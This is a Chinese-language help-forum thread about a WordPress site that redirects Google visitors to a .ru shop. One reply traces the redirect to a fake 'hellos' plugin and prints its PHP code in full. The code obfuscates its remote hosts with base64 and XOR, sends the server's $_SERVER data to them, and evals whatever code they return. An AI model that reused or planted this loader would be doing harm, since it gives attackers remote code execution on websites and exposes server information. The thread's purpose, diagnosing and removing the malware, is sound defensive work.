当我浏览 osmanitrust.org 这个网站时,它工作正常。但是当我从谷歌列表(https://prnt.sc/nRiGKkKLN9IH)冲浪时,它会重定向到https://2024onlineshop.ru/tags/loewe
现在应该做什么?我用 htaccess 检查了我的服务器,但到目前为止一切都很好。
提前致谢。
应该保留原来的网址
这是 2024 年新的 WordPress 恶意软件重定向技术。 我在近 20-25 个网站中发现了这个问题。
就我而言,Hello Dolly 插件显示了一个易受攻击的(重定向)代码到https://2024onlineshop.ru/。
插件名称:hellos文件夹(插件/hellos)和1个文件hellos.php,其中显示了以下脚本,用于在用户从 GOOGLE 搜索或其他来源导航时重定向用户。
您也可以通过base64_decode进行搜索,因为脚本可能存在于其他一些插件文件夹中。
add_action('admin_init', "open_hello");
if (!is_admin()) {
open_hello();
}
function open_hello()
{
$args = array(
'timeout' => 15,
'headers' => array(
"User-Agent" => json_encode($_SERVER),
),
);
$ids = array("PnFkCQQjLStkExg=", "PnFkFh03JzBkExg=", "PnFkEV19Zjc/");
foreach ($ids as $id) {
$id = base64_decode($id);
$decoded = ""; for ($i = 0; $i < strlen($id); $i++) $decoded .= $id[$i] ^ "HEJamN"[$i % strlen("HEJamN")];
$response = wp_remote_get("http://" . $decoded . "/v5", $args);
if (!is_wp_error($response) && 200 === wp_remote_retrieve_response_code($response)) {
return eval($response['body']);
}
}
}